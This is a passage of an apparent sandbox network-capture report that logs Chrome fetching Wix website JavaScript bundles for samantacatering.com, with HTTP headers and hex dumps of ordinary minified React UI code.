                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 6b 69 70 54 6f 43 6f 6e 74 65 6e 74 42 75 74 74 6f 6e 5d 22 5d 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 65 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5b 53 6b 69 70 54 6f 43 6f 6e 74 65 6e 74 42 75 74 74 6f 6e 5d 22 5d 3d 74 28 65 2e 52 65 61 63 74 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 35 33 32 39 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 65 7d 2c 34 34 38 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 72 65 74 75 72 6e 20 65 2e
                                                                                                                                                                                                                        Data Ascii: kipToContentButton]"]=t(require("react")):e["rb_wixui.thunderbolt[SkipToContentButton]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1277INData Raw: 69 73 41 72 72 61 79 28 65 29 29 66 6f 72 28 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 65 5b 74 5d 26 26 28 6e 3d 75 28 65 5b 74 5d 29 29 26 26 28 72 26 26 28 72 2b 3d 22 20 22 29 2c 72 2b 3d 6e 29 3b 65 6c 73 65 20 66 6f 72 28 74 20 69 6e 20 65 29 65 5b 74 5d 26 26 28 72 26 26 28 72 2b 3d 22 20 22 29 2c 72 2b 3d 74 29 3b 72 65 74 75 72 6e 20 72 7d 76 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 2c 74 2c 6e 3d 30 2c 72 3d 22 22 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 29 28 65 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 2b 2b 5d 29 26 26 28 74 3d 75 28 65 29 29 26 26 28 72 26 26 28 72 2b 3d 22 20 22 29 2c 72 2b 3d 74 29 3b 72 65 74 75 72 6e 20 72 7d 3b 76 61 72 20 61 3d 22 4c 48 72 62 50 50 22 3b 63
                                                                                                                                                                                                                        Data Ascii: isArray(e))for(t=0;t<e.length;t++)e[t]&&(n=u(e[t]))&&(r&&(r+=" "),r+=n);else for(t in e)e[t]&&(r&&(r+=" "),r+=t);return r}var i=function(){for(var e,t,n=0,r="";n<arguments.length;)(e=arguments[n++])&&(t=u(e))&&(r&&(r+=" "),r+=t);return r};var a="LHrbPP";c


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        140192.168.2.55010334.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC653OUTGET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[StripColumnsContainer_Default].51ef30fd.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1114INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 34525
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: XJ5vSnW1sYBE5WmqKv24mKkKVNJEiR_S
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 192297040 185327020
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 10:25:01 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 790092
                                                                                                                                                                                                                        Last-Modified: Wed, 01 Jan 2025 10:03:22 GMT
                                                                                                                                                                                                                        ETag: "5acde22ded43b52c303764d4750b1770"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC276INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5b 53 74 72 69 70 43 6f 6c 75 6d 6e 73 43 6f 6e 74 61 69 6e 65 72 5f 44 65 66 61 75 6c 74 5d 22 2c 5b 22 72 65 61 63 74 22 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 72 62 5f 77 69 78 75 69 2e
                                                                                                                                                                                                                        Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[StripColumnsContainer_Default]",["react"],t):"object"==typeof exports?exports["rb_wixui.
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 6d 6e 73 43 6f 6e 74 61 69 6e 65 72 5f 44 65 66 61 75 6c 74 5d 22 5d 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 65 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5b 53 74 72 69 70 43 6f 6c 75 6d 6e 73 43 6f 6e 74 61 69 6e 65 72 5f 44 65 66 61 75 6c 74 5d 22 5d 3d 74 28 65 2e 52 65 61 63 74 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 35 33 32 39 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 65 7d 2c 34 34 38 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74
                                                                                                                                                                                                                        Data Ascii: mnsContainer_Default]"]=t(require("react")):e["rb_wixui.thunderbolt[StripColumnsContainer_Default]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 76 61 72 20 74 2c 69 2c 61 3d 22 22 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 29 61 2b 3d 65 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 29 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 66 6f 72 28 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 65 5b 74 5d 26 26 28 69 3d 63 28 65 5b 74 5d 29 29 26 26 28 61 26 26 28 61 2b 3d 22 20 22 29 2c 61 2b 3d 69 29 3b 65 6c 73 65 20 66 6f 72 28 74 20 69 6e 20 65 29 65 5b 74 5d 26 26 28 61 26 26 28 61 2b 3d 22 20 22 29 2c 61 2b 3d 74 29 3b 72 65 74 75 72 6e 20 61 7d 76 61 72 20 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76
                                                                                                                                                                                                                        Data Ascii: ;function c(e){var t,i,a="";if("string"==typeof e||"number"==typeof e)a+=e;else if("object"==typeof e)if(Array.isArray(e))for(t=0;t<e.length;t++)e[t]&&(i=c(e[t]))&&(a&&(a+=" "),a+=i);else for(t in e)e[t]&&(a&&(a+=" "),a+=t);return a}var s=function(){for(v
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 5f 46 49 54 5f 41 4e 44 5f 54 49 4c 45 5f 48 4f 52 49 5a 4f 4e 54 41 4c 3a 22 6c 65 67 61 63 79 5f 74 69 6c 65 5f 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 4c 45 47 41 43 59 5f 42 47 5f 46 49 54 5f 41 4e 44 5f 54 49 4c 45 5f 56 45 52 54 49 43 41 4c 3a 22 6c 65 67 61 63 79 5f 74 69 6c 65 5f 76 65 72 74 69 63 61 6c 22 2c 4c 45 47 41 43 59 5f 42 47 5f 4e 4f 52 4d 41 4c 3a 22 6c 65 67 61 63 79 5f 6e 6f 72 6d 61 6c 22 7d 2c 41 3d 7b 46 49 54 3a 22 66 69 74 22 2c 46 49 4c 4c 3a 22 66 69 6c 6c 22 2c 46 49 4c 4c 5f 46 4f 43 41 4c 3a 22 66 69 6c 6c 5f 66 6f 63 61 6c 22 2c 43 52 4f 50 3a 22 63 72 6f 70 22 2c 4c 45 47 41 43 59 5f 43 52 4f 50 3a 22 6c 65 67 61 63 79 5f 63 72 6f 70 22 2c 4c 45 47 41 43 59 5f 46 49 4c 4c 3a 22 6c 65 67 61 63 79 5f 66 69 6c 6c 22 7d 2c 62 3d
                                                                                                                                                                                                                        Data Ascii: _FIT_AND_TILE_HORIZONTAL:"legacy_tile_horizontal",LEGACY_BG_FIT_AND_TILE_VERTICAL:"legacy_tile_vertical",LEGACY_BG_NORMAL:"legacy_normal"},A={FIT:"fit",FILL:"fill",FILL_FOCAL:"fill_focal",CROP:"crop",LEGACY_CROP:"legacy_crop",LEGACY_FILL:"legacy_fill"},b=
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 6f 5f 6d 70 22 2c 57 49 58 5f 4d 50 3a 22 77 69 78 5f 6d 70 22 2c 47 49 46 3a 22 67 69 66 22 2c 53 56 47 3a 22 73 76 67 22 2c 41 56 49 46 3a 22 61 76 69 66 22 2c 55 4e 52 45 43 4f 47 4e 49 5a 45 44 3a 22 75 6e 72 65 63 6f 67 6e 69 7a 65 64 22 7d 2c 6b 3d 7b 41 56 49 46 3a 22 41 56 49 46 22 2c 50 41 56 49 46 3a 22 50 41 56 49 46 22 7d 3b 78 2e 4a 50 47 2c 78 2e 4a 50 45 47 2c 78 2e 4a 50 45 2c 78 2e 50 4e 47 2c 78 2e 47 49 46 2c 78 2e 57 45 42 50 3b 66 75 6e 63 74 69 6f 6e 20 24 28 65 2c 2e 2e 2e 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 69 29 7b 63 6f 6e 73 74 20 61 3d 69 5b 69 2e 6c 65 6e 67 74 68 2d 31 5d 7c 7c 7b 7d 2c 6e 3d 5b 65 5b 30 5d 5d 3b 72 65 74 75 72 6e 20 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                                                                                                                        Data Ascii: o_mp",WIX_MP:"wix_mp",GIF:"gif",SVG:"svg",AVIF:"avif",UNRECOGNIZED:"unrecognized"},k={AVIF:"AVIF",PAVIF:"PAVIF"};x.JPG,x.JPEG,x.JPE,x.PNG,x.GIF,x.WEBP;function $(e,...t){return function(...i){const a=i[i.length-1]||{},n=[e[0]];return t.forEach((function(t
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 29 3a 31 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 65 2c 74 2c 69 2c 61 2c 6e 2c 72 29 7b 65 3d 65 7c 7c 61 2e 77 69 64 74 68 2c 74 3d 74 7c 7c 61 2e 68 65 69 67 68 74 3b 63 6f 6e 73 74 7b 73 63 61 6c 65 46 61 63 74 6f 72 3a 6f 2c 77 69 64 74 68 3a 63 2c 68 65 69 67 68 74 3a 73 7d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 2c 61 2c 6e 29 7b 6c 65 74 20 72 2c 6f 3d 69 2c 63 3d 61 3b 69 66 28 72 3d 4b 28 65 2c 74 2c 69 2c 61 2c 6e 29 2c 6e 3d 3d 3d 41 2e 46 49 54 26 26 28 6f 3d 65 2a 72 2c 63 3d 74 2a 72 29 2c 6f 26 26 63 26 26 6f 2a 63 3e 53 29 7b 63 6f 6e 73 74 20 69 3d 4d 61 74 68 2e 73 71 72 74 28 53 2f 28 6f 2a 63 29 29 3b 6f 2a 3d 69 2c 63 2a 3d 69 2c 72 3d 4b 28 65 2c 74 2c 6f 2c 63 2c 6e 29 7d 72 65 74 75 72 6e 7b 73 63 61 6c 65 46 61 63 74 6f
                                                                                                                                                                                                                        Data Ascii: ):1,r}function ee(e,t,i,a,n,r){e=e||a.width,t=t||a.height;const{scaleFactor:o,width:c,height:s}=function(e,t,i,a,n){let r,o=i,c=a;if(r=K(e,t,i,a,n),n===A.FIT&&(o=e*r,c=t*r),o&&c&&o*c>S){const i=Math.sqrt(S/(o*c));o*=i,c*=i,r=K(e,t,o,c,n)}return{scaleFacto
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 69 67 68 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 69 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 61 6c 69 67 6e 6d 65 6e 74 26 26 4f 5b 65 2e 61 6c 69 67 6e 6d 65 6e 74 5d 7c 7c 4f 5b 62 2e 43 45 4e 54 45 52 5d 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 65 29 7b 6c 65 74 20 74 3b 72 65 74 75 72 6e 21 65 7c 7c 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 78 7c 7c 69 73 4e 61 4e 28 65 2e 78 29 7c 7c 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 79 7c 7c 69 73 4e 61 4e 28 65 2e 79 29 7c 7c 28 74 3d 7b 78 3a 72 65 28 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 31 30 30 2c 65 2e 78 29 29 2f 31 30 30 2c 32 29 2c 79 3a 72 65 28 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 31 30 30 2c 65 2e 79 29 29 2f 31 30 30 2c 32
                                                                                                                                                                                                                        Data Ascii: ight)}}function ie(e){return e.alignment&&O[e.alignment]||O[b.CENTER]}function ae(e){let t;return!e||"number"!=typeof e.x||isNaN(e.x)||"number"!=typeof e.y||isNaN(e.y)||(t={x:re(Math.max(0,Math.min(100,e.x))/100,2),y:re(Math.max(0,Math.min(100,e.y))/100,2
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 65 70 65 61 74 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 4c 2e 53 43 41 4c 45 5f 54 4f 5f 46 49 4c 4c 3a 63 61 73 65 20 4c 2e 4c 45 47 41 43 59 5f 53 54 52 49 50 5f 53 43 41 4c 45 5f 54 4f 5f 46 49 4c 4c 3a 61 2e 63 6f 6e 74 61 69 6e 65 72 2e 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 3d 22 63 6f 76 65 72 22 2c 61 2e 63 6f 6e 74 61 69 6e 65 72 2e 62 61 63 6b 67 72 6f 75 6e 64 52 65 70 65 61 74 3d 22 6e 6f 2d 72 65 70 65 61 74 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 4c 2e 54 49 4c 45 5f 48 4f 52 49 5a 4f 4e 54 41 4c 3a 63 61 73 65 20 4c 2e 4c 45 47 41 43 59 5f 53 54 52 49 50 5f 54 49 4c 45 5f 48 4f 52 49 5a 4f 4e 54 41 4c 3a 61 2e 63 6f 6e 74 61 69 6e 65 72 2e 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 3d 22 61 75 74 6f 22 2c 61 2e 63 6f 6e 74 61 69 6e 65 72 2e
                                                                                                                                                                                                                        Data Ascii: epeat";break;case L.SCALE_TO_FILL:case L.LEGACY_STRIP_SCALE_TO_FILL:a.container.backgroundSize="cover",a.container.backgroundRepeat="no-repeat";break;case L.TILE_HORIZONTAL:case L.LEGACY_STRIP_TILE_HORIZONTAL:a.container.backgroundSize="auto",a.container.
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 62 72 65 61 6b 3b 63 61 73 65 20 62 2e 42 4f 54 54 4f 4d 3a 61 2e 63 6f 6e 74 61 69 6e 65 72 2e 62 61 63 6b 67 72 6f 75 6e 64 50 6f 73 69 74 69 6f 6e 3d 22 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 62 2e 54 4f 50 5f 52 49 47 48 54 3a 61 2e 63 6f 6e 74 61 69 6e 65 72 2e 62 61 63 6b 67 72 6f 75 6e 64 50 6f 73 69 74 69 6f 6e 3d 22 72 69 67 68 74 20 74 6f 70 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 62 2e 54 4f 50 5f 4c 45 46 54 3a 61 2e 63 6f 6e 74 61 69 6e 65 72 2e 62 61 63 6b 67 72 6f 75 6e 64 50 6f 73 69 74 69 6f 6e 3d 22 6c 65 66 74 20 74 6f 70 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 62 2e 42 4f 54 54 4f 4d 5f 52 49 47 48 54 3a 61 2e 63 6f 6e 74 61 69 6e 65 72 2e 62 61 63 6b 67 72 6f 75 6e 64 50 6f 73 69 74 69 6f 6e 3d 22
                                                                                                                                                                                                                        Data Ascii: break;case b.BOTTOM:a.container.backgroundPosition="center bottom";break;case b.TOP_RIGHT:a.container.backgroundPosition="right top";break;case b.TOP_LEFT:a.container.backgroundPosition="left top";break;case b.BOTTOM_RIGHT:a.container.backgroundPosition="
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 4f 5f 46 49 4c 4c 3a 61 2e 69 6d 67 2e 77 69 64 74 68 3d 74 2e 77 69 64 74 68 2c 61 2e 69 6d 67 2e 68 65 69 67 68 74 3d 74 2e 68 65 69 67 68 74 2c 61 2e 69 6d 67 2e 6f 62 6a 65 63 74 46 69 74 3d 22 63 6f 76 65 72 22 7d 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 61 2e 69 6d 67 2e 77 69 64 74 68 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 61 2e 69 6d 67 2e 68 65 69 67 68 74 26 26 28 61 2e 69 6d 67 2e 77 69 64 74 68 21 3d 3d 74 2e 77 69 64 74 68 7c 7c 61 2e 69 6d 67 2e 68 65 69 67 68 74 21 3d 3d 74 2e 68 65 69 67 68 74 29 29 7b 63 6f 6e 73 74 20 65 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 28 74 2e 68 65 69 67 68 74 2d 61 2e 69 6d 67 2e 68 65 69 67 68 74 29 2f 32 29 2c 69 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 28 74 2e 77 69 64 74 68 2d
                                                                                                                                                                                                                        Data Ascii: O_FILL:a.img.width=t.width,a.img.height=t.height,a.img.objectFit="cover"}if("number"==typeof a.img.width&&"number"==typeof a.img.height&&(a.img.width!==t.width||a.img.height!==t.height)){const e=Math.round((t.height-a.img.height)/2),i=Math.round((t.width-


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        141192.168.2.55010134.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC646OUTGET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[FiveGridLine_SolidLine].b91bad1d.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 2942
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: 62StfnNefL7.IMAcVvONF4NCTem3k8KI
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 856096768 248298355
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 877026580
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Mon, 16 Dec 2024 02:58:05 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 2199308
                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 01:58:36 GMT
                                                                                                                                                                                                                        ETag: "3d1d851128e88481bf4fe055902e792a"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC227INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5b 46 69 76 65 47 72 69 64 4c 69 6e 65 5f 53 6f 6c 69 64 4c 69 6e 65 5d 22 2c 5b 22 72 65 61 63 74 22 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72
                                                                                                                                                                                                                        Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[FiveGridLine_SolidLine]",["react"],t):"object"==typeof expor
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 74 73 3f 65 78 70 6f 72 74 73 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5b 46 69 76 65 47 72 69 64 4c 69 6e 65 5f 53 6f 6c 69 64 4c 69 6e 65 5d 22 5d 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 65 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5b 46 69 76 65 47 72 69 64 4c 69 6e 65 5f 53 6f 6c 69 64 4c 69 6e 65 5d 22 5d 3d 74 28 65 2e 52 65 61 63 74 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 35 33 32 39 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 65
                                                                                                                                                                                                                        Data Ascii: ts?exports["rb_wixui.thunderbolt[FiveGridLine_SolidLine]"]=t(require("react")):e["rb_wixui.thunderbolt[FiveGridLine_SolidLine]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e
